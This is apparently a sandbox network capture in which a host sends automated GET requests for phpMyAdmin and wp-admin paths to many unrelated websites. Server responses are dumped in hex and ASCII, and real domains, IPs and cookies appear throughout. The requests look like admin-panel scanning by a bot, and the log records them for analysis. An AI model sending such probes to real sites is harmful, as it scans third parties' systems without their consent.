2023-12-22 20:15:01 UTC	1362	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.15 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Cache-Control: max-age=0, no-cache, s-maxage=10 X-Frame-Options: SAMEORIGIN Set-Cookie: PHPSESSID=91lfkch1si1j5ohqrtftmafe7n; path=/ Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Set-Cookie: wordpress_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:01 GMT; Max-Age=0; path=/wp-admin Set-Cookie: wordpress_sec_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:01 GMT; Max-Age=0; path=/wp-admin Set-Cookie: wordpress_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:01 GMT; Max-Age=0; path=/wp-content/plugins Set-Cookie: wordpress_sec_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:01 GMT; Max-Age=0; path=/wp-content/plugins Set-Cookie: wordpress_logged_in_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:01 GMT; Max-Age=0; path=/ Set-Cookie: wordpress_logged_in_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:01 GMT; Max-Age=0; path=/ Set-Cookie: wp-settings-0=%20; expires=Thu, 22-Dec-2022 20:15:01 GMT; Max-Age=0; path=/
2023-12-22 20:15:01 UTC	1261	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 70 2d 73 65 74 74 69 6e 67 73 2d 74 69 6d 65 2d 30 3d 25 32 30 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 32 2d 44 65 63 2d 32 30 32 32 20 32 30 3a 31 35 3a 30 31 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 70 61 74 68 3d 2f 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 30 30 36 34 63 39 66 66 62 36 35 34 34 35 66 63 34 66 63 31 32 33 34 65 31 65 66 34 66 64 61 39 3d 25 32 30 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 32 2d 44 65 63 2d 32 30 32 32 20 32 30 3a 31 35 3a 30 31 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 70 61 74 68 3d 2f 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 30 30 36 34 63 39 66 66 62 36 35 34 34 35 66 63 34 66 63 31 32 Data Ascii: Set-Cookie: wp-settings-time-0=%20; expires=Thu, 22-Dec-2022 20:15:01 GMT; Max-Age=0; path=/Set-Cookie: wordpress_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:01 GMT; Max-Age=0; path=/Set-Cookie: wordpress_0064c9ffb65445fc4fc12
2023-12-22 20:15:01 UTC	381	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 59 38 72 59 30 44 6c 59 39 4c 46 51 62 42 45 6f 54 57 45 4e 36 4e 52 65 38 46 4c 33 32 75 6f 34 6f 30 78 73 49 61 63 70 64 67 63 70 41 55 55 70 35 69 61 5a 71 39 4a 6a 4c 6c 7a 78 65 42 73 25 32 46 30 25 32 46 25 32 42 52 5a 4f 49 6a 47 65 4c 57 57 45 31 34 6b 75 48 38 64 72 57 54 4e 52 71 25 32 42 4f 36 50 4a 62 52 49 67 63 4d 49 31 42 73 72 41 30 6c 6d 25 32 46 50 66 44 56 75 51 78 71 66 32 54 30 4b 32 6a 53 76 77 4f 25 32 46 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Y8rY0DlY9LFQbBEoTWEN6NRe8FL32uo4o0xsIacpdgcpAUUp5iaZq9JjLlzxeBs%2F0%2F%2BRZOIjGeLWWE14kuH8drWTNRq%2BO6PJbRIgcMI1BsrA0lm%2FPfDVuQxqf2T0K2jSvwO%2F"}],"group":"cf-nel","max_age":60
2023-12-22 20:15:01 UTC	1369	IN	Data Raw: 31 36 36 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 68 65 20 50 72 6f 64 75 63 65 20 42 6f 78 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 Data Ascii: 166d<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><title>Log In &lsaquo; The Produce Box — WordPress</title><meta name='robots' content='noindex, follow'/><link rel='styleshe
2023-12-22 20:15:01 UTC	1369	IN	Data Raw: 2e 70 68 70 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 09 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 3e 55 73 65 72 6e 61 6d 65 20 6f 72 20 45 6d 61 69 6c 20 41 64 64 72 65 73 73 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 6c 6f 67 22 20 69 64 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 22 20 76 61 6c 75 65 3d 22 22 20 73 69 7a 65 3d 22 32 30 22 20 61 75 74 6f 63 61 70 69 74 61 6c 69 7a 65 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 75 73 65 72 6e 61 6d 65 22 20 72 65 71 75 69 72 65 64 3d 22 72 65 71 75 69 72 65 64 22 2f 3e 0a 09 09 09 3c 2f 70 3e 0a 0a 09 09 09 3c 64 69 Data Ascii: .php" method="post"><p><label for="user_login">Username or Email Address</label><input type="text" name="log" id="user_login" class="input" value="" size="20" autocapitalize="off" autocomplete="username" required="required"/></p><di
2023-12-22 20:15:01 UTC	1369	IN	Data Raw: 6f 72 64 3f 3c 2f 61 3e 09 09 09 3c 2f 70 3e 0a 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 66 75 6e 63 74 69 6f 6e 20 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 64 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 75 73 65 72 5f 6c 6f 67 69 6e 22 29 3b 64 2e 66 6f 63 75 73 28 29 3b 64 2e 73 65 6c 65 63 74 28 29 3b 7d 63 61 74 63 68 28 65 72 29 7b 7d 7d 2c 32 30 30 29 3b 7d 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 3b 69 66 28 74 79 70 65 6f 66 20 77 70 4f 6e 6c 6f 61 64 3d 3d 3d 27 66 75 6e 63 74 69 6f 6e 27 29 7b 77 70 4f 6e 6c 6f Data Ascii: ord?</a></p><script type="text/javascript">//<![CDATA[function wp_attempt_focus(){setTimeout(function(){try{d=document.getElementById("user_login");d.focus();d.select();}catch(er){}},200);}wp_attempt_focus();if(typeof wpOnload==='function'){wpOnlo
2023-12-22 20:15:01 UTC	1369	IN	Data Raw: 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 76 65 6e 64 6f 72 2f 77 70 2d 70 6f 6c 79 66 69 6c 6c 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 31 35 2e 30 22 20 69 64 3d 22 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 68 6f 6f 6b 73 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 63 36 61 65 63 39 61 38 64 34 65 35 61 35 64 35 34 33 61 31 22 20 69 64 3d 22 77 70 2d 68 6f 6f 6b 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 Data Ascii: ducebox.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0" id="wp-polyfill-js"></script><script type="text/javascript" src="https://theproducebox.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1" id="wp-hooks-js"></script><script
2023-12-22 20:15:01 UTC	273	IN	Data Raw: 70 74 22 20 69 64 3d 22 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 2d 65 78 74 72 61 22 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 75 73 65 72 50 72 6f 66 69 6c 65 4c 31 30 6e 3d 7b 22 75 73 65 72 5f 69 64 22 3a 22 30 22 2c 22 6e 6f 6e 63 65 22 3a 22 66 34 30 64 31 32 37 39 61 39 22 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 6a 73 2f 75 73 65 72 2d 70 72 6f 66 69 6c 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 34 2e 32 22 20 69 64 3d 22 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f Data Ascii: pt" id="user-profile-js-extra">//<![CDATA[var userProfileL10n={"user_id":"0","nonce":"f40d1279a9"};//...</script><script type="text/javascript" src="https://theproducebox.com/wp-admin/js/user-profile.min.js?ver=6.4.2" id="user-profile-js"></script></
2023-12-22 20:15:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
167	192.168.2.4	63774	13.248.169.48	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:00 UTC	339	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: customizedperformance.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:01 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:15:01 GMT Content-Type: text/html Content-Length: 12976 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-32b0" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_CClkH08lTKSQfDazrVhFAuzAnR91dnxlb7ESHF/zmqxdiG69LeLPmsPrZxBV+dGe7xCTCSMNP70neoy8l9SF1A Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:15:01 UTC	12976	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
168	192.168.2.4	63844	104.21.52.80	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:00 UTC	175	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:01 UTC	981	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: https://cannaclear.com CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: no-cache, must-revalidate, max-age=0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Vary: X-Forwarded-Proto,Accept-Encoding x-redirect-by: Rank Math Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FH1sKd36lXWMZ5bpHOZTJVX76HE%2B2rc3BZBJggsRMDbgnGdj6aYj58VB9rWU0gdOwjqr7KD%2F6C1Jk7%2FX86GFA8fb7DqdYJoU7hDmTpt8h9oRyYQ%2BYAqwTs1SW7lcbpglxQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b08d03ffb6dd1-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
169	192.168.2.4	63776	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:00 UTC	327	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: loghole.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:01 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:15:01 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_W6wpjYJtVVcSKdJGsvRUlmYQpCTcH8yL3QKzfg8kuoUpMapiYtDeQpy0Va9r1IRQWi/cLOCpZA3wO1bt1hnAgQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:15:01 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
170	192.168.2.4	63913	104.21.52.80	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:00 UTC	219	OUT	GET /wp-admin/ HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://cannaclear.com/wp-login.php
2023-12-22 20:15:01 UTC	1050	IN	HTTP/1.1 302 Found Date: Fri, 22 Dec 2023 20:15:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: https://cannaclear.com/wp-login.php?redirect_to=https%3A%2F%2Fcannaclear.com%2Fwp-admin%2F&reauth=1 CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: no-cache, must-revalidate, max-age=0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Vary: X-Forwarded-Proto,Accept-Encoding x-redirect-by: WordPress Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PW6Pb2TXO5IP%2F%2Bpr6tcsMtlIbqrViowbpW1DYu4czODEqgYWt9kmCGK8%2FELr9KN%2BVco1yE6ibxsP1Iz94czPnIRiT%2BQgzN88mysuktHidmYTCPMzBJOCuF%2FTGz%2F36zKLyg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b08d0484f67c3-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
171	192.168.2.4	63794	69.42.204.12	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:01 UTC	173	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: bldowney.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:01 UTC	164	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:01 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2023-12-22 20:15:01 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port
172	192.168.2.4	63842	34.149.87.45	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:01 UTC	184	OUT	GET /phpMyAdmin HTTP/1.1 Host: www.valentinegrowers.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:01 UTC	1086	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Content-Language: en Strict-Transport-Security: max-age=3600 X-Wix-Request-Id: 1703276101.30517092997863620259 Age: 0 Cache-Control: no-cache Server: Pepyaka/1.19.10 X-Content-Type-Options: nosniff Accept-Ranges: bytes Date: Fri, 22 Dec 2023 20:15:01 GMT X-Served-By: cache-dfw-kdfw8210156-DFW X-Cache: MISS Vary: Accept-Encoding Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_g X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLupO/enPqTWY4Qy4iOZWWztGkFvVdT2Nq6f3Hedj7ewB,2d58ifebGbosy5xc+FRalq9Cfwf7LcODof4R64mYJN7tXVe+wUQOXuUxsQ74iKQx719L5qO09GqA9VtpiZlTsw==,2UNV7KOq4oGjA5+PKsX47HWShCS4DzdxDWECJm/3qSgfbJaKSXYQ/lskq2jK6SGP,Uh3+FND4gW3xHL7Yw3zy0HOx5fM3NYGU2oh/PYLAjKs=,hUeKicgprlF3Ei9qMBzezHDp2DKwVkOLOSLKHrQkz7w=,WDMzHiyOL7uW518fW2Byr2GuGiStFB9OWrVR4y4nAsbQHalDg5GXgutSG6W0vh+Sw9doegBPDuevU6lQBO5pKA== Transfer-Encoding: chunked Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-12-22 20:15:01 UTC	166	IN	Data Raw: 62 37 31 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 Data Ascii: b71 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-sc
2023-12-22 20:15:01 UTC	1252	IN	Data Raw: 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 Data Ascii: ale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' \| translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width">
2023-12-22 20:15:01 UTC	1252	IN	Data Raw: 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 